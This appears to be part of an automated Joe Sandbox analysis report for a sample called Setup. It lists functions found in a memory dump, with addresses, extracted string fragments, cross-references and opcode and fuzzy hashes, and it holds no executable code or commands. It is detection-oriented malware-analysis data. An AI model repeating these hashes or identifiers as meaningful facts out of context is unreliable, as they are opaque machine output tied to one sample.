Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 333321d7748d681832f8b49f08b2c4246fc55238b8a52f0827d1574feaaed049
Instruction ID: 91263b478c42db59b1847b704fe3b372943f94ce210e0ac5fd3c82a199117e8a
Opcode Fuzzy Hash: 333321d7748d681832f8b49f08b2c4246fc55238b8a52f0827d1574feaaed049
Instruction Fuzzy Hash: 907234715083419FD714CF18C880BABBBE5BF88318F14892DF99987392D775DA68CB92

Function 02C0A6F2 Relevance: 2.9, Strings: 2, Instructions: 398COMMON

Download Yara Rule

Strings

5, xrefs: 02C0A8B1
=8, xrefs: 02C0A74F

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 5$=8
API String ID: 0-2602551699
Opcode ID: d7227d8eff3940c635693acad4b6fe061a16741386ee5eb7f76f3a9d5cc053d2
Instruction ID: d933a555b62bed72fc19d65491d03b428c2ed0d47f738c78db9607b1c9d33c69
Opcode Fuzzy Hash: d7227d8eff3940c635693acad4b6fe061a16741386ee5eb7f76f3a9d5cc053d2
Instruction Fuzzy Hash: BFC11472A4C3914BC325CF2984A075BFFE1AFD3254F19496DE4D49B382D3398906CBA6

Function 02C05A12 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 02C05E03
), xrefs: 02C05A8D

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: e76bbe72449ff5e884c771fe50fcaf10b8fc205f23557bb031ab6c4f822b4f5d
Instruction ID: 8d6df405694c049710b7095cdfbb7bd294e30fa169bde69846871af1e7c0a3f8
Opcode Fuzzy Hash: e76bbe72449ff5e884c771fe50fcaf10b8fc205f23557bb031ab6c4f822b4f5d
Instruction Fuzzy Hash: D3D19AB1A083449FE720CF15C884B5ABBE4BB94344F54492EF9999B3C1D779E908CF92

Function 02C2C76E Relevance: 2.8, Strings: 2, Instructions: 285COMMON

Download Yara Rule

Strings

LY, xrefs: 02C2CAA4
=4"9, xrefs: 02C2C876

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: =4"9$LY
API String ID: 0-2267171913
Opcode ID: 5ae04df9b6937d105d322284a78b4caaed999501422c880082fa3973faf9e1b1
Instruction ID: f5ad759cc7ac3bcd0e9e0dac599f90d3d78759ec8f90072e8365a7c66aa020f1
Opcode Fuzzy Hash: 5ae04df9b6937d105d322284a78b4caaed999501422c880082fa3973faf9e1b1
Instruction Fuzzy Hash: 4181E57464C3A08FE3358B2884603AFBBD0AF97314F598A5ED4D66B281DB754A09CB53

Function 02C2C7BD Relevance: 2.8, Strings: 2, Instructions: 280COMMON

Download Yara Rule

Strings

LY, xrefs: 02C2CAA4
=4"9, xrefs: 02C2C876

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: =4"9$LY
API String ID: 0-2267171913
Opcode ID: 3105e639c81f50ff3facdbcf950785caad11cae0f2cb6ecdf3354da5c6e0fc36
Instruction ID: 0ca97812e7c2b4d0885d845acc83a44994dddd9d4c88981fd46e36075a97d56f
Opcode Fuzzy Hash: 3105e639c81f50ff3facdbcf950785caad11cae0f2cb6ecdf3354da5c6e0fc36
Instruction Fuzzy Hash: FA81E37464C3A08FE3358B2884603BFBBD1AF93314F598A5ED4D65B281DB794609CB53

Function 02C2C7AE Relevance: 2.8, Strings: 2, Instructions: 254COMMON

Download Yara Rule

Strings

LY, xrefs: 02C2CAA4
=4"9, xrefs: 02C2C876

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: =4"9$LY
API String ID: 0-2267171913
Opcode ID: ac818fe0cc85dc459c69c3b4a7a76587b51b978bc8c7615353fe3c4d09572a08
Instruction ID: c0bd97599ca2720d11b45cc4f930298c5ad009ce6a15c5a10ea284d771b53a44
Opcode Fuzzy Hash: ac818fe0cc85dc459c69c3b4a7a76587b51b978bc8c7615353fe3c4d09572a08
Instruction Fuzzy Hash: 7471C17464C3E08FE3359B2884603ABBBD1AFD3305F594A4DD4D65B282DB75460ACB93

Function 02C186DF Relevance: 2.7, Strings: 2, Instructions: 221COMMON

Download Yara Rule

Strings

7, xrefs: 02C18837
gfff, xrefs: 02C18882

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: 54e96c052bd681a6fe24e27ff15cfe5ac0d6a831a98fada05bb4f7435a8e764c
Instruction ID: 4b3c47eeecd4833a0098cf7e5b1fffeb659150026a678709400870946d817625
Opcode Fuzzy Hash: 54e96c052bd681a6fe24e27ff15cfe5ac0d6a831a98fada05bb4f7435a8e764c
Instruction Fuzzy Hash: 26613672A082118BE328CF29C81177AB7D2FFC6304F19867DE4D9DB295DB749901DB81

Function 02C29213 Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

ps, xrefs: 02C2921F
G, xrefs: 02C29226

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: G$ps
API String ID: 0-1075861082
Opcode ID: 69bdc289806c250f564a258df5985de0a29e38e393431798a827ba1f20481965
Instruction ID: 21acfa012a8bac2d3019bf376a29ab62111db14b56cd1b460efd24e3f674dea3
Opcode Fuzzy Hash: 69bdc289806c250f564a258df5985de0a29e38e393431798a827ba1f20481965
Instruction Fuzzy Hash: AD51D976A046218FCB29CF68D85125FB7F1FF45210F1AC52DC5AAEB785DB349842CB80

Function 02C3CAF3 Relevance: 2.6, Strings: 2, Instructions: 136COMMON

Download Yara Rule

Strings

yxwv, xrefs: 02C3CBDE
yxwv, xrefs: 02C3CB5E

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: yxwv$yxwv
API String ID: 0-2424606590
Opcode ID: e133bcbbab52d2ccedfa6a24bdef54b97f9c4699a973f887d741725b78376bae
Instruction ID: 308817b8da841a72fb5dd3164b6eb2efb55462014b9da0f3457c65ac6fdfbbd0
Opcode Fuzzy Hash: e133bcbbab52d2ccedfa6a24bdef54b97f9c4699a973f887d741725b78376bae
Instruction Fuzzy Hash: 9231F475B045198BDF19CF65E8902BF7363FBCA314B198939C892AB354CB349A428785

Function 02C3B082 Relevance: 2.0, Strings: 1, Instructions: 706COMMON

Download Yara Rule

Strings

f, xrefs: 02C3B2B3

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: e28594ced7b9a1bd1992086f9c7c8c0f320ac66b7edf18504e574ce0dcac939e
Instruction ID: a7c05ec1c7fa69a1f36951b042bd3aa146e00d7d014fb682eba835f76a564d2e
Opcode Fuzzy Hash: e28594ced7b9a1bd1992086f9c7c8c0f320ac66b7edf18504e574ce0dcac939e
Instruction Fuzzy Hash: 2222CF716083518FD715CF19C880B2EBBE1BBC9328F188E2DE59997292D775EE05CB42

Function 02C299C2 Relevance: 1.8, Strings: 1, Instructions: 505COMMON

Download Yara Rule

Strings

EG, xrefs: 02C29CC7

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: EG
API String ID: 0-644214010
Opcode ID: b7ba958b9bd480cff21dad9864d63a469201ef975bf6248fe76e161b4adc0038
Instruction ID: 41e7c05be7b602cdc1745bc096953084b3aab59158cf7502b58dd381e3fc20e0
Opcode Fuzzy Hash: b7ba958b9bd480cff21dad9864d63a469201ef975bf6248fe76e161b4adc0038
Instruction Fuzzy Hash: A8D14874A00321CBCB24CF68C89177AB7B1FF86324F28965CD8916F3A5E7349942CB90

Function 02C22DE2 Relevance: 1.7, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

l1, xrefs: 02C22F8F

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: l1
API String ID: 0-3645847150
Opcode ID: 7dcb455234b5cb94c53c37a959a9ea8efbcce72ddedaa1bef5c3eaeeffae56e1
Instruction ID: 06a89253cec551c098f807bd7dd9ddb4b273ffbee0c0a3f135e8cd8cadf263e0
Opcode Fuzzy Hash: 7dcb455234b5cb94c53c37a959a9ea8efbcce72ddedaa1bef5c3eaeeffae56e1
Instruction Fuzzy Hash: 04B113B16043619BDB24CF64CC9176BB3E5FFC4314F04896CE9858B281EB78E909CB52

Function 02C2B532 Relevance: 1.6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

Strings

", xrefs: 02C2B82A

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: b11f9fc3cfb977688e73512924150e2b33b0a37b4069adab8990f0727325115d
Instruction ID: 5b720cc1591f7e5f887f752f846cc965925a316a8d23488cb03ddc9349e591a2
Opcode Fuzzy Hash: b11f9fc3cfb977688e73512924150e2b33b0a37b4069adab8990f0727325115d
Instruction Fuzzy Hash: 24C1E872A083255BD714DE25C49076AB7E6AFC5318F18892DE8D98B381DF34DE4CCB92

Function 02C2CB4C Relevance: 1.6, Strings: 1, Instructions: 350COMMON

Download Yara Rule

Strings

"{, xrefs: 02C2CEAA

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "{
API String ID: 0-566033515
Opcode ID: a588dd6b5181f6f3dee479ee416c26cfa2b69e77d03f6be0f61b6f8b36dc1b10
Instruction ID: f2b5e5447b49fa767f6e08bd3b083dbf6e5b9da991abec14239b8cce0f4cd5ea
Opcode Fuzzy Hash: a588dd6b5181f6f3dee479ee416c26cfa2b69e77d03f6be0f61b6f8b36dc1b10
Instruction Fuzzy Hash: B0A18F3164C3A18FD7248F28C8917AEBBD2EFD2300F198A2ED4D597381DB359609C792

Function 02C3ECA2 Relevance: 1.6, Strings: 1, Instructions: 340COMMON

Download Yara Rule

Strings

HIJK, xrefs: 02C3ECFE

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: HIJK
API String ID: 0-3946259990
Opcode ID: 4c90d331b8ebf5b99b25e4ee74ba3ccf7370c40627357b69b16095ca156ceacf
Instruction ID: 24009a4ea1239257e4efa8674a1ce72c90fbb10cd72ccaf7f760f4459dfb8ff6
Opcode Fuzzy Hash: 4c90d331b8ebf5b99b25e4ee74ba3ccf7370c40627357b69b16095ca156ceacf
Instruction Fuzzy Hash: 51A15372A083148FD325DF58D8806ABB7A2FFD4300F19893CE99197251D7B9EE45CB81

Function 02C07572 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 02C076A8

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 25ca1e513858b7c69e6d524a8f6e09e04a927aea598f131dfb8b0651f29a0af0
Instruction ID: 6b48d2d8b1db09b9f5d31407e49994beb5d1c934c3c253cecdda9f9dc0fdb1fe
Opcode Fuzzy Hash: 25ca1e513858b7c69e6d524a8f6e09e04a927aea598f131dfb8b0651f29a0af0
Instruction Fuzzy Hash: 6AB14B711083819FC325CF58C89461BFBE0AFA9704F448E2DE5D997782D631EA18CB67

Function 02C236C2 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

Fz, xrefs: 02C2377F

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: Fz
API String ID: 0-1462395486
Opcode ID: 706cbc971ec6e50c8a831aaa54fe331c5dca837f89748504c687b8f3682bb82e
Instruction ID: a3004b5a269042df957273e3ff7e40dba1bb79c03d75d0b69c58a66cc676b7d1
Opcode Fuzzy Hash: 706cbc971ec6e50c8a831aaa54fe331c5dca837f89748504c687b8f3682bb82e
Instruction Fuzzy Hash: E75126B291426047CB249F24CC9267773F0EF95324F089A6DEC868B290F77CE609C751

Function 02C1E922 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

~, xrefs: 02C1E9E7

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 7082b30785db700d6bb603fa2c29ba673ded49e4817ebd93e1863b25fe500efc
Instruction ID: 4e64dd6091c723063a7ed0ff9ec35ef3d659330b3a24c445e7c499e44e931487
Opcode Fuzzy Hash: 7082b30785db700d6bb603fa2c29ba673ded49e4817ebd93e1863b25fe500efc
Instruction Fuzzy Hash: 4D812972A042614FC722CE28885176ABBD1ABC6224F19C23DDCBADB3D1D734D945E7D1

Function 02C2B9E2 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

", xrefs: 02C2BBF0

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 90eee15b6ff8aa2e44d47e4b4810ade9978594ceed370e3aea143d44b0cd3bac
Instruction ID: 2985491e53fbc97f3d4c47eaad221d6c7fd12713344d567148ba7ca8cd610313
Opcode Fuzzy Hash: 90eee15b6ff8aa2e44d47e4b4810ade9978594ceed370e3aea143d44b0cd3bac
Instruction Fuzzy Hash: 4381F432A087258BD724CE2DC88031EB7E2ABC5718F19D52DE4D48B395DB75DD4D8782

Function 02C2682B Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

N, xrefs: 02C271F0

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: e6c6cb46c47ede4b466a339fd2795009d2a625b2e4600d5f67953f7600522c66
Instruction ID: 1c218c889110aa99f0ad635fa51bc4f1486b3def18a320b715d4dd0c69fa335d
Opcode Fuzzy Hash: e6c6cb46c47ede4b466a339fd2795009d2a625b2e4600d5f67953f7600522c66
Instruction Fuzzy Hash: AF512832A093718FC324CA298CC01A7F793EFD5254F0E8669D9994B399DB399A0DC791

Function 02C3F3B2 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

@, xrefs: 02C3F476

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ab015ad02a4c42f51c17f4c9533839d91b80fbd9bb7a55a8ac59f8b71208adfa
Instruction ID: 4150fe49179c1bdc2a8be4ce2dd58f4a4c38104b910adf0cee87fe909c689f9a
Opcode Fuzzy Hash: ab015ad02a4c42f51c17f4c9533839d91b80fbd9bb7a55a8ac59f8b71208adfa
Instruction Fuzzy Hash: 9B4124B2E043108BDB14CF28C85576BB7A2FFC5318F198A2CD8995B790E779DA05CB81

Function 02C2C423 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

WAAU, xrefs: 02C2C546

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: WAAU
API String ID: 0-4104508623
Opcode ID: 35688d6c2370056d4882b7c5cc5caf38d82b7cb22c12d7645bf40361d90dee08
Instruction ID: b87dd98aeed0ee0fe51f8b11fc6c3f762b7e00eb6071cdd292eb44ad735bd0aa
Opcode Fuzzy Hash: 35688d6c2370056d4882b7c5cc5caf38d82b7cb22c12d7645bf40361d90dee08
Instruction Fuzzy Hash: 1A41F96190C7E18BD73A8F2584507BBBFD5AF83605F1549ADC4E5AB182CB39830ACB17

Function 02C2C3C7 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

WAAU, xrefs: 02C2C546

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: WAAU
API String ID: 0-4104508623
Opcode ID: 3ef7437f98fb89dc4339ce1bc40ae35ca4c350c05fac62b71d6f86276f9bb0df
Instruction ID: 6782ff44c2f9ae6295eb10ae874c37014dedb0a50192a2dcbf0333e9aff84812
Opcode Fuzzy Hash: 3ef7437f98fb89dc4339ce1bc40ae35ca4c350c05fac62b71d6f86276f9bb0df
Instruction Fuzzy Hash: 72411B6190C7E18BD7368F2584907BBFFD5AFC3205F5549ADC4D55B282CB39420ACB16

Function 02C2942D Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

cH, xrefs: 02C294D3

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: cH
API String ID: 0-3891681731
Opcode ID: 7c4413b265c45996c3b9db170e7fb2c42af75f07d063e841999d17076affaffb
Instruction ID: c91ebd25d6aed5717a1ba7c65af0c926d494209d666e85c6cd4bd6375f89e820
Opcode Fuzzy Hash: 7c4413b265c45996c3b9db170e7fb2c42af75f07d063e841999d17076affaffb
Instruction Fuzzy Hash: 1A41D474D00316CBDB30CF44C8917BAB7B1FF86310F148268D9966BBA1EB78A945DB94

Function 02C0CE5E Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

fg, xrefs: 02C0CEAE

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: fg
API String ID: 0-2712152613
Opcode ID: db62bc0600cf742622f019289c701aba250c4324aa42d0085826d2b1e4279db8
Instruction ID: fb944e48ba41c025f8b1dc0f9fe7772468d5b5ea251eac9dd891b106f98cbd2b
Opcode Fuzzy Hash: db62bc0600cf742622f019289c701aba250c4324aa42d0085826d2b1e4279db8
Instruction Fuzzy Hash: C94100B95083419BC3148F25C891A3BBBE1EFCA314F148A1DF4D597390E7398A06CB1B

Function 02C1A58F Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

* !", xrefs: 02C1A5DB

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: * !"
API String ID: 0-2407105185
Opcode ID: 225110f4b6aab5e380ee14a14d2d36ac1f2394b1ff815fe6bce8a455b11992e4
Instruction ID: fcf92cde03e7c6a7602274d4287df39261535fc9134d23ba0b28c0e4eba6773f
Opcode Fuzzy Hash: 225110f4b6aab5e380ee14a14d2d36ac1f2394b1ff815fe6bce8a455b11992e4
Instruction Fuzzy Hash: F6313232B092604BD329CB248C577BBB2D7A7C6314F29867CC98AA7299DA748D018681

Function 02C3C33F Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

#def, xrefs: 02C3C352

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: #def
API String ID: 0-1615259583
Opcode ID: 474a1fcdab7b61b5e5f5aac52a9838d88c9735344914809a0e88dab8abfbf6c8
Instruction ID: cbb259cdd0552ab690514bfc4fc0f72ca2e809ed251f40fa8e6d96fb39613de4
Opcode Fuzzy Hash: 474a1fcdab7b61b5e5f5aac52a9838d88c9735344914809a0e88dab8abfbf6c8
Instruction Fuzzy Hash: E631043AB048518BDB4CDE29CC25679B7E3FBC530971AD1BDC50AD3364DE38AA4A8644

Function 02C2C39B Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

WAAU, xrefs: 02C2C546

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: WAAU
API String ID: 0-4104508623
Opcode ID: eb030470507d45eaa47809d9a6c8fd8210fee4812082580b42a6506a9e43fc16
Instruction ID: 15114d55252e56e41d2a6efcc7e91b5d3c73d0791343ede1b86932bcc610685d
Opcode Fuzzy Hash: eb030470507d45eaa47809d9a6c8fd8210fee4812082580b42a6506a9e43fc16
Instruction Fuzzy Hash: A531D96490C7E28BD7368F2584507BBBBE49B83605F0548ADC5E9AF183CB34830ACB17

Function 02C3BEB0 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

kR, xrefs: 02C3BFBA

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: kR
API String ID: 0-3027156200
Opcode ID: a7ebf3cc282c086933dadc612e595ad28a72bc77ac7eff6582a9fb32bdb763a6
Instruction ID: ea5253b9020cc4308f2f7194c47a72955921b492e57053c7e1b6254fa4ad2c1e
Opcode Fuzzy Hash: a7ebf3cc282c086933dadc612e595ad28a72bc77ac7eff6582a9fb32bdb763a6
Instruction Fuzzy Hash: 0C2106F4916A42AFDB018F26FC11B1ABBB1BF47300B109A78D4488B311EB39A465DF85

Function 02C3BE33 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

kR, xrefs: 02C3BFBA

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: kR
API String ID: 0-3027156200
Opcode ID: 974bc6c75dfc4f2cb1556d84c3041c1196872c1b59b4579d8c97f35fd9002bb2
Instruction ID: dbffb19377b00563220315cfd11abe865fe9e2c2330797470b9c750f410de7bc
Opcode Fuzzy Hash: 974bc6c75dfc4f2cb1556d84c3041c1196872c1b59b4579d8c97f35fd9002bb2
Instruction Fuzzy Hash: CC0126F4925A429FDB018F22EC11B2ABBB1BF47300B109938C4498B311EB39E421DF85

Function 02C07DA2 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b325d01681261994c5e97ca79d6315eba18d9df0c506adad844aa4914549bc66
Instruction ID: 58fa61c985e7b04ebfc65f6d4e0783e051812772b59a927addce12271a04a2b2
Opcode Fuzzy Hash: b325d01681261994c5e97ca79d6315eba18d9df0c506adad844aa4914549bc66
Instruction Fuzzy Hash: 6E52A470908B849FEB35CB24C8D47A7BBE1AFC1314F148E6DD5EA06AC2C379A685C715

Function 02C04662 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 310d3ab3e520911b944654895b1f1787e66a8e9227b83f2c760c6cd34f91e768
Instruction ID: 274d3406441c69734fd0ccc04be92803220e5afb18f917c46190f06f0a8964f7
Opcode Fuzzy Hash: 310d3ab3e520911b944654895b1f1787e66a8e9227b83f2c760c6cd34f91e768
Instruction Fuzzy Hash: 9652D0715083858BCB28CF19C0D06ABBBE1BFC9318F198A6DE9D957381D774E949CB81

Function 02C08B72 Relevance: .6, Instructions: 620COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92935db9df340ce926184e16ae1e993745bb69002ea50ba942ceea2fa3e46154
Instruction ID: e3164ac55babbfad01f8d5f6b7ea41cc89667cfc3f10106ac2f0e3a63e14c134
Opcode Fuzzy Hash: 92935db9df340ce926184e16ae1e993745bb69002ea50ba942ceea2fa3e46154
Instruction Fuzzy Hash: 9112D4326087118BC724DF28D8C07ABB3E2FFC4719F198A3DD99597281D735A955CB82

Function 02C05062 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c185013b644f507bb8d49bb4ac1866ffca036e7a686b3ad08de9647f7ccf1a7a
Instruction ID: f6c60f2d27ef515fb3e18860aac7010864ee8e180c41644fbf96c2154b2a1d01
Opcode Fuzzy Hash: c185013b644f507bb8d49bb4ac1866ffca036e7a686b3ad08de9647f7ccf1a7a
Instruction Fuzzy Hash: AE3210B4915B108FC378CF29C5D062ABBF2BF85650B904A2ED6A787A90D736F845CF14

Function 02C20762 Relevance: .6, Instructions: 598COMMON

Download Yara Rule

Memory Dump Source

